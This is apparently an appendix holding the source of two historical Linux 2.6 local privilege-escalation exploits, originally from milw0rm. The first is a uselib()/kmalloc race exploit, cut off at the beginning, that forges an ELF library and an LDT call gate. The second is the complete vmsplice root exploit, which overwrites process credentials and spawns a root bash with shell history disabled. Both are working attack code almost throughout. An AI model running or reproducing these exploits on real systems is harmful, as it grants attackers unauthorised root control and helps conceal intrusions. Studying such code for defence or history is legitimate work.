		"	popa                        \n"
		"	lret                        \n"
	);
}

int callme_2()
{
	return val + task_size + addr_min;
}

void sigfailed(int v)
{
	ccnt++;
	fatal("lcall", 1);
}

// modify LDT & exec
void try_to_exploit(unsigned addr)
{
	volatile int r, *v;

	printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout);

	unlink(libname);

	r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);
	if (r) fatal("mprotect 1", 1);

	// check if really LDT
	v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE));
	signal(SIGSEGV, sigfailed);
	r = *v;
	if (r != MAGIC) {
		printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout);
		fatal("find LDT", 1);
	}

	// yeah, setup CPL0 gate
	v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU);
	v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;
	printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]);
	fflush(stdout);

	// setup CPL0 segment descriptors (we need the 'accessed' versions ;-)
	v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE));
	v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */
	v[1] = 0x00cf9b00;

	v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE));
	v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */
	v[1] = 0x00cf9300;

	// reprotect to get only one big VMA
	r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags);
	if (r) fatal("mprotect 2", 1);

	// CPL0 transition
	sys_sched_yield();
	val = callme_1() + callme_2();
	asm("lcall $" xstr(SEL_GATE) ",$0x0");
	//if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) {
	if (getuid()==0) {
		printf("\n[+] exploited, uid=0\n\n"); fflush(stdout);
	} else {
		printf("\n[-] uid change failed"); fflush(stdout);
		sigfailed(0);
	}
	signal(SIGTERM, SIG_IGN);
	kill(0, SIGTERM);
	setresuid(0, 0, 0);
	execl(shellname, "sh", NULL);
	fatal("execl", 0);
}

void scan_mm_finish();
void scan_mm_start();

// kernel page table scan code
void scan_mm()
{
	map_addr -= PAGE_SIZE;
	if (map_addr <= (unsigned)addr_min)
		scan_mm_start();

	scnt = 0;
	val = *(int*)map_addr;

	scan_mm_finish();
}

void scan_mm_finish()
{
retry:
	__asm__("movl %0, %%esp" : : "m"(old_esp));

	if (scnt) {
		pagemap[pidx] ^= 1;
	} else {
		sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);
	}
	pidx--;
	scan_mm();
	goto retry;
}

// make kernel page maps before and after allocating LDT
void scan_mm_start()
{
	static int npg = 0;
	static struct modify_ldt_ldt_s l;
	//static struct user_desc l;

	pnum++;
	if (pnum==1) {
		pidx = max_page-1;
	} else if (pnum==2) {
		memset(&l, 0, sizeof(l));
		l.entry_number = LDT_ENTRIES-1;
		l.seg_32bit = 1;
		l.base_addr = MAGIC >> 16;
		l.limit = MAGIC & 0xffff;
		l.limit_in_pages = 1;
		if (modify_ldt(1, &l, sizeof(l)) != 0)
			fatal("modify_ldt", 1);
		pidx = max_page-1;
	} else if (pnum==3) {
		npg = 0;
		for (pidx=0; pidx<=max_page-1; pidx++) {
			if (pagemap[pidx]) {
				npg++;
			} else if (npg == LDT_PAGES) {
				npg = 0;
				try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);
			} else {
				npg = 0;
			}
		}
		fatal("find LDT", 1);
	}

	// save context & scan page table
	__asm__("movl %%esp, %0" : : "m"(old_esp));
	map_addr = addr_max;
	scan_mm();
}

// return number of available SLAB objects in cache
int get_slab_objs(const char *sn)
{
	static int c, d, u = 0, a = 0;
	FILE *fp = NULL;
	char x1[20];

	fp = fopen("/proc/slabinfo", "r");
	if (!fp)
		fatal("get_slab_objs: fopen", 0);
	fgets(name, sizeof(name) - 1, fp);
	do {
		c = u = a = -1;
		if (!fgets(line, sizeof(line) - 1, fp))
			break;
		c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a,
			   &d, &d, &d, &d);
	} while (strcmp(name, sn));
	close(fileno(fp));
	fclose(fp);
	return c == 7 ? a - u : -1;
}

long memmaped_size = 0;

// leave one object in the SLAB
inline void prepare_slab()
{
	int *r;

	map_addr -= PAGE_SIZE;
	map_count++;
	map_flags ^= PROT_READ;

	r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,
			     MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

	if (MAP_FAILED == r) {
		printf("--> prepare_slab(), %dMb\n", memmaped_size/1024/1024);
		fatal("try again", 0);
	}
	memmaped_size += PAGE_SIZE;
	*r = map_addr;
}

// sig handlers
void segvcnt(int v)
{
	scnt++;
	scan_mm_finish();
}

// child reap
void reaper(int v)
{
	ccnt++;
	waitpid(0, &v, WNOHANG|WUNTRACED);
}

// sometimes I get the VMAs in reversed order...
// so just use anyone of the two but take care about the flags
void check_vma_flags();

void vreversed(int v)
{
	map_flags = 0;
	check_vma_flags();
}

void check_vma_flags()
{
	if (map_flags) {
		__asm__("movl %%esp, %0" : : "m"(old_esp));
	} else {
		__asm__("movl %0, %%esp" : : "m"(old_esp));
		goto out;
	}
	signal(SIGSEGV, vreversed);
	val = *(unsigned*)(lib_addr + PAGE_SIZE);
out:
	;	/* a label must be followed by a statement */
}

// use elf library and try to sleep on kmalloc
void exploitme()
{
	int r, sz, pcnt = 0;
	static char smiley[] = "-\\|/-\\|/";

	// printf("\n cat /proc/%d/maps", getpid() ); fflush(stdout);
	// helper clone
	finish = 0; ccnt = 0;
	sz = sizeof(cstack) / sizeof(cstack[0]);
	cpid = clone(&raceme, (void*) &cstack[sz-16],
		     CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL);
	if (-1==cpid) fatal("clone", 0);

	// synchronize threads
	while (!finish) sys_sched_yield();
	finish = 0;
	if (!silent) {
		printf("\n"); fflush(stdout);
	}

	// try to hit the kmalloc race
	for (;;) {
		r = get_slab_objs("vm_area_struct");
		//printf("\nfree slab = %d\n",r);
		while (r != 1 && r > 0) {
			prepare_slab();
			r--;
		}

		sys_gettimeofday(&tm1, NULL);
		go = 1;
		r = sys_uselib(libname);
		go = 0;
		if (r) fatal("uselib", 0);
		if (finish) break;

		// wipe lib VMAs and try again
		r = sys_munmap(lib_addr, LIB_SIZE);
		if (r) fatal("munmap lib", 0);

		if (ccnt) goto failed;

		if (!silent && !(pcnt%64)) {
			printf("\r Wait... %c", smiley[(pcnt/64)%8]);
			fflush(stdout);
		}
		pcnt++;
	}

	// seems we raced, free mem
	r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE);
	if (r) fatal("munmap 1", 0);
	r = sys_munmap(lib_addr, PAGE_SIZE);
	if (r) fatal("munmap 2", 0);

	// relax kswapd
	sys_gettimeofday(&tm1, NULL);
	for (;;) {
		sys_sched_yield();
		sys_gettimeofday(&tm2, NULL);
		delta = tmdiff(&tm1, &tm2);
		if (wtime*1000000U <= (unsigned)delta) break;
	}

	// we need to check the PROT_EXEC flag
	map_flags = PROT_EXEC;
	check_vma_flags();
	if (!map_flags) {
		printf("\n VMAs reversed"); fflush(stdout);
	}

	// write protect brk's VMA to fool vm_enough_memory()
	r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE,
			 PROT_READ|map_flags);
	if (-1==r) { fatal("mprotect brk", 0); }

	// this will finally make the big VMA...
	sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE;

expand:
	r = sys_madvise((void*)(lib_addr + PAGE_SIZE),
			LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
	if (r) fatal("madvise", 0);
	r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE,
		       PAGE_SIZE, sz, MREMAP_MAYMOVE, 0);
	if (-1==r) {
		if (0==sz) {
			fatal("mremap: expand VMA", 0);
		} else {
			sz -= PAGE_SIZE;
			goto expand;
		}
	}
	vma_start = lib_addr + PAGE_SIZE;
	vma_end = vma_start + sz + 2*PAGE_SIZE;
	printf("\n expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end);
	fflush(stdout);

	// try to figure kernel layout
	signal(SIGCHLD, reaper);
	signal(SIGSEGV, segvcnt);
	signal(SIGBUS, segvcnt);
	scan_mm_start();

failed:
	printf("failed:\n");
	fatal("try again", 0);
}

// make fake ELF library
void make_lib()
{
	struct elfhdr eh;
	struct elf_phdr eph;
	static char tmpbuf[PAGE_SIZE];
	int fd;

	// make our elf library
	umask(022);
	unlink(libname);
	fd = open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755);
	if (fd<0) fatal("open lib ("LIBNAME" not writable?)", 0);
	memset(&eh, 0, sizeof(eh));

	// elf exec header
	memcpy(eh.e_ident, ELFMAG, SELFMAG);
	eh.e_type = ET_EXEC;
	eh.e_machine = EM_386;
	eh.e_phentsize = sizeof(struct elf_phdr);
	eh.e_phnum = 1;
	eh.e_phoff = sizeof(eh);
	write(fd, &eh, sizeof(eh));

	// program header (single PT_LOAD segment mapped at lib_addr)
	memset(&eph, 0, sizeof(eph));
	eph.p_type = PT_LOAD;
	eph.p_offset = 4096;
	eph.p_filesz = 4096;
	eph.p_vaddr = lib_addr;
	eph.p_memsz = LIB_SIZE;
	eph.p_flags = PF_W|PF_R|PF_X;
	write(fd, &eph, sizeof(eph));

	// execable code
	lseek(fd, 4096, SEEK_SET);
	memset(tmpbuf, 0x90, sizeof(tmpbuf));
	write(fd, &tmpbuf, sizeof(tmpbuf));
	close(fd);
}

// move stack down #2
void prepare_finish()
{
	int r;
	static struct sysinfo si;

	old_esp &= ~(PAGE_SIZE-1);
	old_esp -= PAGE_SIZE;
	task_size = ((unsigned)old_esp + 1 GB) / (1 GB) * 1 GB;
	r = sys_munmap(old_esp, task_size-old_esp);
	if (r) fatal("unmap stack", 0);

	// setup rt env
	uid = getuid();
	lib_addr = task_size - LIB_SIZE - PAGE_SIZE;
	if (map_base)
		map_addr = map_base;
	else
		map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);
	printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x",
	       old_esp, task_size, map_base); fflush(stdout);

	// check physical mem & prepare
	sysinfo(&si);
	addr_min = task_size + si.totalram;
	addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1);
	addr_max = addr_min + si.totalram;
	if ((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min)
		addr_max = 0xffffd000;

	printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max);
	max_page = (addr_max - addr_min) / PAGE_SIZE;
	pagemap = malloc(max_page + 32);
	if (!pagemap) fatal("malloc pagemap", 1);
	memset(pagemap, 0, max_page + 32);

	// go go
	make_lib();
	exploitme();
}

// move stack down #1
void prepare()
{
	unsigned p = 0;

	environ = myenv;

	p = sys_mmap2(0, STACK_SIZE, PROT_READ|PROT_WRITE,
		      MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (-1==p) fatal("mmap2 stack", 0);
	p += STACK_SIZE - 64;

	__asm__("movl %%esp, %0 \n"
		"movl %1, %%esp \n"
		: : "m"(old_esp), "m"(p));

	prepare_finish();
}

void chldcnt(int v)
{
	ccnt++;
}

// alloc slab objects...
inline void do_wipe()
{
	int *r, c = 0, left = 0;

	__asm__("movl %%esp, %0" : : "m"(old_esp));

	old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);
	old_esp = map_base ? map_base : old_esp;

	for (;;) {
		if (left<=0)
			left = get_slab_objs("vm_area_struct");
		if (left <= SLAB_THRSH)
			break;

		left--;

		map_flags ^= PROT_READ;
		old_esp -= PAGE_SIZE;
		r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,
				     MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
		if (MAP_FAILED == r)
			break;

		if (c>SLAB_PER_CHLD)
			break;

		if ((c%1024)==0) {
			if (!c) printf("\n");
			printf("\r child %d VMAs %d", val, c);
			fflush(stdout);
		}
		c++;
	}
	printf("\r child %d VMAs %d", val, c);
	fflush(stdout);
	kill(getppid(), SIGUSR1);
	for (;;) pause();
}

// empty SLAB caches
void wipe_slab()
{
	signal(SIGUSR1, chldcnt);
	printf("\n[+] SLAB cleanup"); fflush(stdout);
	for (;;) {
		ccnt = 0;
		val++;
		cpid = fork();
		if (!cpid)
			do_wipe();

		while (!ccnt) sys_sched_yield();
		if (get_slab_objs("vm_area_struct") <= SLAB_THRSH)
			break;
	}
	signal(SIGUSR1, SIG_DFL);
}

void usage(char *n)
{
	printf("\nUsage: %s\t-f forced stop\n", n);
	printf("\t\t-s silent mode\n");
	printf("\t\t-c command to run\n");
	printf("\t\t-n SMP iterations\n");
	printf("\t\t-d race delta us\n");
	printf("\t\t-w wait time seconds\n");
	printf("\t\t-l alternate lib name\n");
	printf("\t\t-a alternate addr hex\n");
	printf("\n");
	_exit(1);
}

// give -s for forced stop, -b to clean SLAB
int main(int ac, char **av)
{
	int r;

	while (ac) {
		r = getopt(ac, av, "n:l:a:w:c:d:fsh");
		if (r<0) break;

		switch (r) {
		case 'f':
			fstop = 1;
			break;

		case 's':
			silent = 1;
			break;

		case 'n':
			smp_max = atoi(optarg);
			break;

		case 'd':
			if (1!=sscanf(optarg, "%u", &delta_max) || delta_max > 100000u)
				fatal("bad delta value", 0);
			break;

		case 'w':
			wtime = atoi(optarg);
			if (wtime<0) fatal("bad wait value", 0);
			break;

		case 'l':
			libname = strdup(optarg);
			break;

		case 'c':
			shellname = strdup(optarg);
			break;

		case 'a':
			if (1!=sscanf(optarg, "%x", &map_base))
				fatal("bad addr value", 0);
			map_base &= ~(PGD_SIZE-1);
			break;

		case 'h':
		default:
			usage(av[0]);
			break;
		}
	}

	// helper process that eats free memory for the duration of the race
	consume_pid = fork();
	if (consume_pid == 0) {
		consume_memory();
		pause();
		return 0;
	}

	// basic setup
	uid = getuid();
	setpgrp();
	wipe_slab();
	prepare();

	return 0;
}

// milw0rm.com [2005-01-27]

B. Source code for the Kernel 2.6 vmsplice exploit

/*
 * jessica_biel_naked_in_my_bed.c
 *
 * I roll in from the pub and see that Wojta has nothing to do again, damn.
 * Lads, here you have a little something to play with, before this one too gets blabbed out.
 * Anyway, it's old as hell and also somewhat broken.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remember original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 *
 * -static -Wno-format
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};

void	exit_code();
char	exit_stack[1024 * 1024];

void die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif

#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void * get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif

#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void * get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}

	exit_kernel();
}

void exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[2]);
	printf("[+] page: 0x%lx\n", pages[3]);

	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);

	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);

	/*****/
	if (pipe(pi) < 0) die("pipe", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	die("vmsplice", errno);

	return 0;
}

// milw0rm.com [2008-02-09]